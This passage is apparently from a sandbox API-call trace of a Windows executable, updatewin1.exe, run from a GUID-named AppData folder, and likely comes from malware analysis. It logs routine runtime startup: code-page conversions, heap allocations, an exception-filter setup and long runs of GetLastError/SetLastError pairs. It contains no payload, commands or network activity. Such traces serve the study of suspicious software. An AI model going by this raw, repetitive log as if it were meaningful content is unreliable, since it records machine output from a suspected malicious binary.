lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0076.536] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᕯ錞㞕AĀ") returned 256 [0076.536] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᕯ錞㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0076.536] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᕯ錞㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0076.536] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@];\x8e\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0076.536] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe")) returned 0x5f [0076.536] GetLastError () returned 0x0 [0076.537] SetLastError (dwErrCode=0x0) [0076.537] GetLastError () returned 0x0 [0076.537] SetLastError (dwErrCode=0x0) [0076.537] GetLastError () returned 0x0 [0076.537] SetLastError (dwErrCode=0x0) [0076.537] GetLastError () returned 0x0 [0076.537] SetLastError (dwErrCode=0x0) [0076.537] GetLastError () returned 0x0 [0076.537] SetLastError (dwErrCode=0x0) [0076.537] GetLastError () returned 0x0 [0076.537] SetLastError (dwErrCode=0x0) [0076.538] GetLastError () returned 0x0 [0076.540] SetLastError (dwErrCode=0x0) [0076.540] GetLastError () returned 0x0 [0076.540] SetLastError (dwErrCode=0x0) [0076.540] GetLastError () returned 0x0 [0076.540] SetLastError (dwErrCode=0x0) [0076.540] GetLastError () returned 0x0 [0076.541] SetLastError (dwErrCode=0x0) [0076.541] GetLastError () returned 0x0 [0076.541] SetLastError (dwErrCode=0x0) [0076.541] GetLastError () returned 0x0 [0076.541] SetLastError (dwErrCode=0x0) [0076.541] GetLastError () returned 0x0 [0076.541] SetLastError (dwErrCode=0x0) [0076.541] GetLastError () returned 0x0 [0076.541] SetLastError (dwErrCode=0x0) [0076.541] GetLastError () returned 0x0 [0076.542] SetLastError (dwErrCode=0x0) [0076.542] GetLastError () returned 0x0 [0076.542] SetLastError (dwErrCode=0x0) [0076.542] GetLastError () returned 0x0 [0076.542] SetLastError (dwErrCode=0x0) [0076.542] GetLastError () returned 0x0 [0076.546] SetLastError (dwErrCode=0x0) [0076.546] GetLastError () returned 0x0 [0076.546] SetLastError (dwErrCode=0x0) [0076.546] GetLastError () returned 0x0 [0076.546] SetLastError (dwErrCode=0x0) [0076.546] GetLastError () returned 0x0 [0076.546] SetLastError (dwErrCode=0x0) [0076.547] GetLastError () returned 0x0 [0076.547] SetLastError (dwErrCode=0x0) [0076.547] GetLastError () returned 0x0 [0076.547] SetLastError (dwErrCode=0x0) [0076.547] GetLastError () returned 0x0 [0076.547] SetLastError (dwErrCode=0x0) [0076.547] GetLastError () returned 0x0 [0076.547] SetLastError (dwErrCode=0x0) [0076.547] GetLastError () returned 0x0 [0076.548] SetLastError (dwErrCode=0x0) [0076.548] GetLastError () returned 0x0 [0076.548] SetLastError (dwErrCode=0x0) [0076.548] GetLastError () returned 0x0 [0076.548] SetLastError (dwErrCode=0x0) [0076.548] GetLastError () returned 0x0 [0076.548] SetLastError (dwErrCode=0x0) [0076.548] GetLastError () returned 0x0 [0076.549] SetLastError (dwErrCode=0x0) [0076.549] GetLastError () returned 0x0 [0076.549] SetLastError (dwErrCode=0x0) [0076.549] GetLastError () returned 0x0 [0076.549] SetLastError (dwErrCode=0x0) [0076.549] GetLastError () returned 0x0 [0076.549] SetLastError (dwErrCode=0x0) [0076.549] GetLastError () returned 0x0 [0076.549] SetLastError (dwErrCode=0x0) [0076.550] GetLastError () returned 0x0 [0076.550] SetLastError (dwErrCode=0x0) [0076.550] GetLastError () returned 0x0 [0076.550] SetLastError (dwErrCode=0x0) [0076.550] GetLastError () returned 0x0 [0076.550] SetLastError (dwErrCode=0x0) [0076.550] GetLastError () returned 0x0 [0076.550] SetLastError (dwErrCode=0x0) [0076.551] GetLastError () returned 0x0 [0076.551] SetLastError (dwErrCode=0x0) [0076.551] GetLastError () returned 0x0 [0076.551] SetLastError (dwErrCode=0x0) [0076.551] GetLastError () returned 0x0 [0076.551] SetLastError (dwErrCode=0x0) [0076.551] GetLastError () returned 0x0 [0076.551] SetLastError (dwErrCode=0x0) [0076.551] GetLastError () returned 0x0 [0076.552] SetLastError (dwErrCode=0x0) [0076.552] GetLastError () returned 0x0 [0076.552] SetLastError (dwErrCode=0x0) [0076.552] GetLastError () returned 0x0 [0076.552] SetLastError (dwErrCode=0x0) [0076.552] GetLastError () returned 0x0 [0076.552] SetLastError (dwErrCode=0x0) [0076.557] GetLastError () returned 0x0 [0076.557] SetLastError (dwErrCode=0x0) [0076.557] GetLastError () returned 0x0 [0076.557] SetLastError (dwErrCode=0x0) [0076.557] GetLastError () returned 0x0 [0076.557] SetLastError (dwErrCode=0x0) [0076.557] GetLastError () returned 0x0 [0076.557] SetLastError (dwErrCode=0x0) [0076.557] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.558] SetLastError (dwErrCode=0x0) [0076.558] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] GetLastError () returned 0x0 [0076.559] SetLastError (dwErrCode=0x0) [0076.559] GetLastError () returned 0x0 [0076.640] SetLastError (dwErrCode=0x0) [0076.640] GetLastError () returned 0x0 [0076.640] SetLastError (dwErrCode=0x0) [0076.640] GetLastError () returned 0x0 [0076.641] SetLastError (dwErrCode=0x0) [0076.641] GetLastError () returned 0x0 [0076.641] SetLastError (dwErrCode=0x0) [0076.641] GetLastError () returned 0x0 [0076.641] SetLastError (dwErrCode=0x0) [0076.641] GetLastError () returned 0x0 [0076.641] SetLastError (dwErrCode=0x0) [0076.641] GetLastError () returned 0x0 [0076.641] SetLastError (dwErrCode=0x0) [0076.642] GetLastError () returned 0x0 [0076.642] SetLastError (dwErrCode=0x0) [0076.642] GetLastError () returned 0x0 [0076.642] SetLastError (dwErrCode=0x0) [0076.642] GetLastError () returned 0x0 [0076.642] SetLastError (dwErrCode=0x0) [0076.642] GetLastError () returned 0x0 [0076.643] SetLastError (dwErrCode=0x0) [0076.643] GetLastError () returned 0x0 [0076.643] SetLastError (dwErrCode=0x0) [0076.643] GetLastError () returned 0x0 [0076.643] SetLastError (dwErrCode=0x0) [0076.643] GetLastError () returned 0x0 [0076.643] SetLastError (dwErrCode=0x0) [0076.643] GetLastError () returned 0x0 [0076.644] SetLastError (dwErrCode=0x0) [0076.644] GetLastError () returned 0x0 [0076.644] SetLastError (dwErrCode=0x0) [0076.644] GetLastError () returned 0x0 [0076.644] SetLastError (dwErrCode=0x0) [0076.644] GetLastError () returned 0x0 [0076.644] SetLastError (dwErrCode=0x0) [0076.644] GetLastError () returned 0x0 [0076.644] SetLastError (dwErrCode=0x0) [0076.644] GetLastError () returned 0x0 [0076.645] SetLastError (dwErrCode=0x0) [0076.645] GetLastError () returned 0x0 [0076.645] SetLastError (dwErrCode=0x0) [0076.645] GetLastError () returned 0x0 [0076.645] SetLastError (dwErrCode=0x0) [0076.645] GetLastError () returned 0x0 [0076.645] SetLastError (dwErrCode=0x0) [0076.645] GetLastError () returned 0x0 [0076.645] SetLastError (dwErrCode=0x0) [0076.646] GetLastError () returned 0x0 [0076.646] SetLastError (dwErrCode=0x0) [0076.646] GetLastError () returned 0x0 [0076.646] SetLastError (dwErrCode=0x0) [0076.646] GetLastError () returned 0x0 [0076.646] SetLastError (dwErrCode=0x0) [0076.646] GetLastError () returned 0x0 [0076.646] SetLastError (dwErrCode=0x0) [0076.646] GetLastError () returned 0x0 [0076.647] SetLastError (dwErrCode=0x0) [0076.647] GetLastError () returned 0x0 [0076.679] SetLastError (dwErrCode=0x0) [0076.679] GetLastError () returned 0x0 [0076.680] SetLastError (dwErrCode=0x0) [0076.680] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x0, Size=0x68) returned 0x1e11990 [0076.680] GetLastError () returned 0x0 [0076.680] SetLastError (dwErrCode=0x0) [0076.680] GetLastError () returned 0x0 [0076.680] SetLastError (dwErrCode=0x0) [0076.680] GetLastError () returned 0x0 [0076.680] SetLastError (dwErrCode=0x0) [0076.680] GetLastError () returned 0x0 [0076.681] SetLastError (dwErrCode=0x0) [0076.681] GetLastError () returned 0x0 [0076.681] SetLastError (dwErrCode=0x0) [0076.681] GetLastError () returned 0x0 [0076.681] SetLastError (dwErrCode=0x0) [0076.681] GetLastError () returned 0x0 [0076.681] SetLastError (dwErrCode=0x0) [0076.681] GetLastError () returned 0x0 [0076.682] SetLastError (dwErrCode=0x0) [0076.682] GetLastError () returned 0x0 [0076.682] SetLastError (dwErrCode=0x0) [0076.682] GetLastError () returned 0x0 [0076.682] SetLastError (dwErrCode=0x0) [0076.682] GetLastError () returned 0x0 [0076.682] SetLastError (dwErrCode=0x0) [0076.682] GetLastError () returned 0x0 [0076.682] SetLastError (dwErrCode=0x0) [0076.682] GetLastError () returned 0x0 [0076.683] SetLastError (dwErrCode=0x0) [0076.683] GetLastError () returned 0x0 [0076.683] SetLastError (dwErrCode=0x0) [0076.683] GetLastError () returned 0x0 [0076.683] SetLastError (dwErrCode=0x0) [0076.683] GetLastError () returned 0x0 [0076.683] SetLastError (dwErrCode=0x0) [0076.683] GetLastError () returned 0x0 [0076.684] SetLastError (dwErrCode=0x0) [0076.684] GetLastError () returned 0x0 [0076.684] SetLastError (dwErrCode=0x0) [0076.684] GetLastError () returned 0x0 [0076.684] SetLastError (dwErrCode=0x0) [0076.684] GetLastError () returned 0x0 [0076.684] SetLastError (dwErrCode=0x0) [0076.684] GetLastError () returned 0x0 [0076.685] SetLastError (dwErrCode=0x0) [0076.685] GetLastError () returned 0x0 [0076.685] SetLastError (dwErrCode=0x0) [0076.685] GetLastError () returned 0x0 [0076.685] SetLastError (dwErrCode=0x0) [0076.685] GetLastError () returned 0x0 [0076.685] SetLastError (dwErrCode=0x0) [0076.685] GetLastError () returned 0x0 [0076.685] SetLastError (dwErrCode=0x0) [0076.686] GetLastError () returned 0x0 [0076.686] SetLastError (dwErrCode=0x0) [0076.686] GetLastError () returned 0x0 [0076.686] SetLastError (dwErrCode=0x0) [0076.686] GetLastError () returned 0x0 [0076.686] SetLastError (dwErrCode=0x0) [0076.686] GetLastError () returned 0x0 [0076.686] SetLastError (dwErrCode=0x0) [0076.686] GetLastError () returned 0x0 [0076.686] SetLastError (dwErrCode=0x0) [0076.687] GetLastError () returned 0x0 [0076.687] SetLastError (dwErrCode=0x0) [0076.687] GetLastError () returned 0x0 [0076.687] SetLastError (dwErrCode=0x0) [0076.687] GetLastError () returned 0x0 [0076.687] SetLastError (dwErrCode=0x0) [0076.687] GetLastError () returned 0x0 [0076.687] SetLastError (dwErrCode=0x0) [0076.687] GetLastError () returned 0x0 [0076.689] SetLastError (dwErrCode=0x0) [0076.689] GetLastError () returned 0x0 [0076.689] SetLastError (dwErrCode=0x0) [0076.690] GetLastError () returned 0x0 [0076.690] SetLastError (dwErrCode=0x0) [0076.690] GetLastError () returned 0x0 [0076.690] SetLastError (dwErrCode=0x0) [0076.690] GetLastError () returned 0x0 [0076.690] SetLastError (dwErrCode=0x0) [0076.690] GetLastError () returned 0x0 [0076.690] SetLastError (dwErrCode=0x0) [0076.690] GetLastError () returned 0x0 [0076.691] SetLastError (dwErrCode=0x0) [0076.691] GetLastError () returned 0x0 [0076.691] SetLastError (dwErrCode=0x0) [0076.691] GetLastError () returned 0x0 [0076.691] SetLastError (dwErrCode=0x0) [0076.691] GetLastError () returned 0x0 [0076.691] SetLastError (dwErrCode=0x0) [0076.691] GetLastError () returned 0x0 [0076.692] SetLastError (dwErrCode=0x0) [0076.692] GetLastError () returned 0x0 [0076.692] SetLastError (dwErrCode=0x0) [0076.692] GetLastError () returned 0x0 [0076.692] SetLastError (dwErrCode=0x0) [0076.692] GetLastError () returned 0x0 [0076.692] SetLastError (dwErrCode=0x0) [0076.692] GetLastError () returned 0x0 [0076.693] SetLastError (dwErrCode=0x0) [0076.693] GetLastError () returned 0x0 [0076.693] SetLastError (dwErrCode=0x0) [0076.693] GetLastError () returned 0x0 [0076.693] SetLastError (dwErrCode=0x0) [0076.693] GetLastError () returned 0x0 [0076.693] SetLastError (dwErrCode=0x0) [0076.694] GetLastError () returned 0x0 [0076.728] SetLastError (dwErrCode=0x0) [0076.728] GetLastError () returned 0x0 [0076.728] SetLastError (dwErrCode=0x0) [0076.728] GetLastError () returned 0x0 [0076.729] SetLastError (dwErrCode=0x0) [0076.729] GetLastError () returned 0x0 [0076.729] SetLastError (dwErrCode=0x0) [0076.729] GetLastError () returned 0x0 [0076.729] SetLastError (dwErrCode=0x0) [0076.729] GetLastError () returned 0x0 [0076.729] SetLastError (dwErrCode=0x0) [0076.729] GetLastError () returned 0x0 [0076.729] SetLastError (dwErrCode=0x0) [0076.729] GetLastError () returned 0x0 [0076.730] SetLastError (dwErrCode=0x0) [0076.730] GetLastError () returned 0x0 [0076.730] SetLastError (dwErrCode=0x0) [0076.730] GetLastError () returned 0x0 [0076.730] SetLastError (dwErrCode=0x0) [0076.730] GetLastError () returned 0x0 [0076.730] SetLastError (dwErrCode=0x0) [0076.730] GetLastError () returned 0x0 [0076.731] SetLastError (dwErrCode=0x0) [0076.731] GetLastError () returned 0x0 [0076.731] SetLastError (dwErrCode=0x0) [0076.731] GetLastError () returned 0x0 [0076.731] SetLastError (dwErrCode=0x0) [0076.731] GetLastError () returned 0x0 [0076.731] SetLastError (dwErrCode=0x0) [0076.732] GetLastError () returned 0x0 [0076.732] SetLastError (dwErrCode=0x0) [0076.732] GetLastError () returned 0x0 [0076.732] SetLastError (dwErrCode=0x0) [0076.732] GetLastError () returned 0x0 [0076.732] SetLastError (dwErrCode=0x0) [0076.732] GetLastError () returned 0x0 [0076.732] SetLastError (dwErrCode=0x0) [0076.733] GetLastError () returned 0x0 [0076.733] SetLastError (dwErrCode=0x0) [0076.733] GetLastError () returned 0x0 [0076.733] SetLastError (dwErrCode=0x0) [0076.733] GetLastError () returned 0x0 [0076.733] SetLastError (dwErrCode=0x0) [0076.733] GetLastError () returned 0x0 [0076.734] SetLastError (dwErrCode=0x0) [0076.734] GetLastError () returned 0x0 [0076.734] SetLastError (dwErrCode=0x0) [0076.734] GetLastError () returned 0x0 [0076.734] SetLastError (dwErrCode=0x0) [0076.734] GetLastError () returned 0x0 [0076.734] SetLastError (dwErrCode=0x0) [0076.734] GetLastError () returned 0x0 [0076.735] SetLastError (dwErrCode=0x0) [0076.735] GetLastError () returned 0x0 [0076.735] SetLastError (dwErrCode=0x0) [0076.735] GetLastError () returned 0x0 [0076.735] SetLastError (dwErrCode=0x0) [0076.735] GetLastError () returned 0x0 [0076.735] SetLastError (dwErrCode=0x0) [0076.735] GetLastError () returned 0x0 [0076.735] SetLastError (dwErrCode=0x0) [0076.736] GetLastError () returned 0x0 [0076.736] SetLastError (dwErrCode=0x0) [0076.736] GetLastError () returned 0x0 [0076.736] SetLastError (dwErrCode=0x0) [0076.736] GetLastError () returned 0x0 [0076.736] SetLastError (dwErrCode=0x0) [0076.736] GetLastError () returned 0x0 [0076.736] SetLastError (dwErrCode=0x0) [0076.736] GetLastError () returned 0x0 [0076.736] SetLastError (dwErrCode=0x0) [0076.736] GetLastError () returned 0x0 [0076.737] SetLastError (dwErrCode=0x0) [0076.737] GetLastError () returned 0x0 [0076.737] SetLastError (dwErrCode=0x0) [0076.737] GetLastError () returned 0x0 [0076.737] SetLastError (dwErrCode=0x0) [0076.737] GetLastError () returned 0x0 [0076.737] SetLastError (dwErrCode=0x0) [0076.737] GetLastError () returned 0x0 [0076.737] SetLastError (dwErrCode=0x0) [0076.737] GetLastError () returned 0x0 [0076.737] SetLastError (dwErrCode=0x0) [0076.737] GetLastError () returned 0x0 [0076.738] SetLastError (dwErrCode=0x0) [0076.738] GetLastError () returned 0x0 [0076.738] SetLastError (dwErrCode=0x0) [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x98) returned 0x1e11a00 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x1f) returned 0x1e11aa0 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x36) returned 0x1e11ac8 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x37) returned 0x1e11b08 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x3c) returned 0x1e11b48 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x31) returned 0x1e11b90 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x17) returned 0x1e11bd0 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x24) returned 0x1e11bf0 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x14) returned 0x1e11c20 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0xd) returned 0x1e11c40 [0076.738] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x25) returned 0x1e11c58 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x39) returned 0x1e11c88 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x18) returned 0x1e11cd0 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x17) returned 0x1e11cf0 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0xe) returned 0x1e11d10 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x69) returned 0x1e11d28 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x3e) returned 0x1e11da0 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x1b) returned 0x1e11de8 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x1d) returned 0x1e11e10 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x48) returned 0x1e11e38 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x12) returned 0x1e11e88 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x18) returned 0x1e11ea8 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x1b) returned 0x1e11ec8 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x24) returned 0x1e11ef0 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x29) returned 0x1e11f20 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x1e) returned 0x1e11f58 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x41) returned 0x1e11f80 [0076.739] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x17) returned 0x1e11fd0 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0xf) returned 0x1e11ff0 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x16) returned 0x1e12008 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x2a) returned 0x1e12028 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x29) returned 0x1e12060 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x15) returned 0x1e12098 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x1e) returned 0x1e120b8 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x2a) returned 0x1e120e0 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x12) returned 0x1e12118 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x18) returned 0x1e12138 [0076.740] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x46) returned 0x1e12158 [0076.741] HeapFree (in: hHeap=0x1e10000, dwFlags=0x0, lpMem=0x1e111f8 | out: hHeap=0x1e10000) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x800) returned 0x1e121a8 [0076.744] RtlAllocateHeap (HeapHandle=0x1e10000, Flags=0x8, Size=0x80) returned 0x1e111f8 [0076.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0076.745] RtlSizeHeap (HeapHandle=0x1e10000, Flags=0x0, MemoryPointer=0x1e111f8) returned 0x80 [0076.746] GetLastError () returned 0x0 [0076.746] SetLastError (dwErrCode=0x0) [0076.746] GetLastError () returned 0x0 [0076.746] SetLastError (dwErrCode=0x0) [0076.746] GetLastError () returned 0x0 [0076.746] SetLastError (dwErrCode=0x0) [0076.746] GetLastError () returned 0x0 [0076.746] SetLastError (dwErrCode=0x0) [0076.747] GetLastError () returned 0x0 [0076.747] SetLastError (dwErrCode=0x0) [0076.747] GetLastError () returned 0x0 [0076.747] SetLastError 